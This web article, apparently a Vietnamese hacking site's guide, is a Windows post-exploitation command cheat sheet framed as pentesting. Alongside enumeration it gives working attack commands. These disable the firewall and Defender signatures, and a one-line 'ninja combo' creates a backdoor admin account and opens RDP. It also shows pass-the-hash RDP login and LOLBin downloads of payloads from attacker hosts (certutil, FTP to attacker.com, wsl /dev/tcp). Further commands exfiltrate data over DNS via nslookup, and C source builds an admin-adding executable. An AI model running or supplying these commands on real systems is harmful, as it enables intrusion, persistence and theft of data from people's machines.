If you want to hack Windows you need to know these CMD commands

In this article, I will list the most common and basic CMD commands that Windows pentesters often use. Because this article is very technical in nature, I will not explain those commands in detail. But only briefly about the effect of the command. If you cannot use any command, then 1 is that you entered the wrong syntax, 2 is that the command is not installed on the system so it cannot be used.

System-related CMD commands for Pentester

First of all, why when hacking into Windows you need to know these basic commands. Because once you have enabled Shell on Windows, the next thing you need to do is turn off the Firewall, create a backup User for later Login again…

So mastering the commands below the Pentester will save more time when exploiting Windows vulnerabilities.

Version and patch information

View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture

Full system information: systeminfo

View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn

Hostname: hostname

View third-party drivers: DRIVERQUERY 

Environment

List all environment variables: set

Some env variables to know:

• COMPUTERNAME: Computer name
• TEMP/TMP: Temp folder (save temporary files)
• USERNAME: Username
• HOMEPATH/USERPROFILE: Home Links
• windir: C:\Windows
• LOGONSERVER: Name of domain controller
• USERDNSDOMAIN: Domain using DNS
• USERDOMAIN: Domain Name

DNS request for PC: nslookup %LOGONSERVER%.%USERDNSDOMAIN%

Drive is connected

wmic logicaldisk get caption 2
wmic logicaldisk get caption,description,providername

Anti Virus

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Delete the privacy rules of Defender (intentional for machines without internet): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

Details of scheduled tasks:

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
List of processes: tasklist /V

Processes that enable services: tasklist /SVC

Active Windows Services: net start

List of services: wmic service list briefor sc query

Installed 64bit software: dir /a “C:\Program Files”

Installed 32bit softwares: dir /a "C:\Program Files (x86)"

Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE

Domain Information

echo %USERDOMAIN% #Tên Domain
echo %USERDNSDOMAIN% #Tên Domain khi máy tính có đăng nhập vào Domain
echo %logonserver% #Tên domain controller
set logonserver #Tên domain controller
set log #Tên domain controller
net groups /domain #Danh sách domain group
net group "domain computers" /domain #Danh sách PC đã kết nối với domain
net view /domain #Danh sách PC của domain
nltest /dclist:<DOMAIN> #Danh sách domain controllers
net group "Domain Controllers" /domain #Danh sách tài khoản PC của domains controllers
net group "Domain Admins" /domain #Danh sách user có đặc quyền quản trị domain
net localgroup administrators /domain #Danh sách các admin group bên trong domain (bao gồm cả group "Domain Admins")
net user /domain #Danh sách tất cả user của domain
net user <ACCOUNT_NAME> /domain #Thông tin về user
net accounts /domain #View the domain’s current password and login limit
nltest /domain_trust #Mapping domain relationships

Logs & Events

Make a security query using the credentials: wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

whoami /all #Tất cả thông tin về bạn
whoami /priv #Show only privileges
net users #Tất cả các user
dir /b /ad "C:\Users"
net user %username% #Thông tin về user (bạn)
net accounts #Thông tin về mật khẩu
qwinsta #Có ai khác đã đăng nhập không?
cmdkey /list #Danh sách các chứng chỉ
net user /add [username] [password] #Tạo user

#Mở cmd.exe mới với các creds mới (để mạo danh trong mạng)
runas /netonly /user:<USERNAME>\administrator cmd

#Kiểm tra phiên đăng nhập hiện tại với tư cách là quản trị viên bằng cách sử dụng phiên đăng nhập từ sysinternals. Đọc thêm here
logonsessions.exe
logonsessions64.exe

Groups

#Local
net localgroup #All groups exist
net localgroup Administrators #Thông tin về group group (admins)
net localgroup administrators [username] /add #Thêm người dùng vào administrators

#Domain
net group /domain #Thông tin về group domain
net group /domain <domain_group_name> #Người dùng thuộc group

List of sessions

qwinsta
klist sessions

Password Policy

net accounts

Add users to the group

# Thêm user domain vào Group Domain Admins
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Thêm local user vào group local Admins
net user username password /ADD
net localgroup Administrators username /ADD

# Thêm user vào các group khác:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

ipconfig /all #Thông tin về interfaces
route print #Xem các routes hiện cóó
arp -a #Thông tin về host
netstat -ano #Các port đang mởở
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

Information about the firewall and open ports:

netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config # Thông tin firewall
Netsh Advfirewall show allprofiles
Turn off and on the firewall:

NetSh Advfirewall set allprofiles state off #Tắt Firewall
NetSh Advfirewall set allprofiles state on #Bật Firewall
netsh firewall set opmode disable #Tắt firewall
How to open ports:

netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Desktop:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

::netsh firewall set service remotedesktop enable #Không cần thiết
::sc config TermService start= auto #Unnecessary
::net start Termservice #Không cần thiết
Turn on Remote assistance:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Ninja combo (new admin user, allow RDP + Rassistance + Firewall)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup “Remote Desktop Users” hacker /add & reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add “ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 “Remote Desktop” & netsh firewall set service remoteadmin enable
Connect to RDP (using hash or password)

xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Share

net view #Lấy danh sách máy tính
net view /all /domain [domainname] #Shares trên domains
net view \\computer /ALL #danh sách máy tính tham gia share
net use x: \\computer\share #Kết nối ổ với share
net share #Check current share

WIFI

netsh wlan show profile #Xem SSID của wifi từng kết nối

netsh wlan show profile <SSID> key=clear #Xem mật khẩu wifi

SNMP

Read this article to know what is SNMP?

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

ipconfig /all

ARP

arp -A

Download

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extract32.exe

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

HH.exe http://some.url/script.ps1

ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

squirrel.exe --download [url to package]

Update.exe

Update.exe --download [url to package]

Winword.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd #Đường dẫn hiện tại
cd folder #Truy cập vào thư mục
dir #Danh sách các thư mục và file trong đường dẫn hiện tại
dir /a:h *path #Danh sách các file ẩn
dir /s /b #Tất cả đường dẫn trong
time #Thời gian hiện tại
date #Ngày hiện tại
shutdown /r /t 0 #Tắt máy tính ngay lập tức
type <file> #Đọc file
Runas

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Hide files

attrib +h file #Bật ẩn file
attrib -h file #Tắt ẩn file
Gives full control over the files you have

icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Xóa quyền
Recursively copy files
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
ADS (What is ADS?)

dir /r #Phát hiện ADS
more file.txt:ads.txt #Đọc ADS
powershell (Get-Content file.txt -Stream ads.txt)

Listen to the ACLs . address

You can listen http://+:80/Temporary_Listen_Addresses/ without admin rights
netsh http show urlacl

DNS shell

You use one of the following 2 options:

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim
Skill for /f tokens _**_: Lets me execute the command, taking the first X word of each line and sending it via DNS to my server.

for /f %a in ('whoami') do nslookup %a <IP_kali> 
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> 
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #Danh sách thư mục
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #Liệt kê các thư mục đó
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Giống lệnh trước đó
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Giống lệnh trước đó

You can also redirect the output and then read it.

whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

Calling CMD from code C

#include <stdlib.h>

// Khi file được thực thi bởi Admin, chương trình này sẽ tạo một user và sau đó thêm user đó vào nhóm Admin
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}

The above are the basic pentest cmd commands for Windows, those who want to learn more about pentester can go to Anonyviet’s new Discord server Please.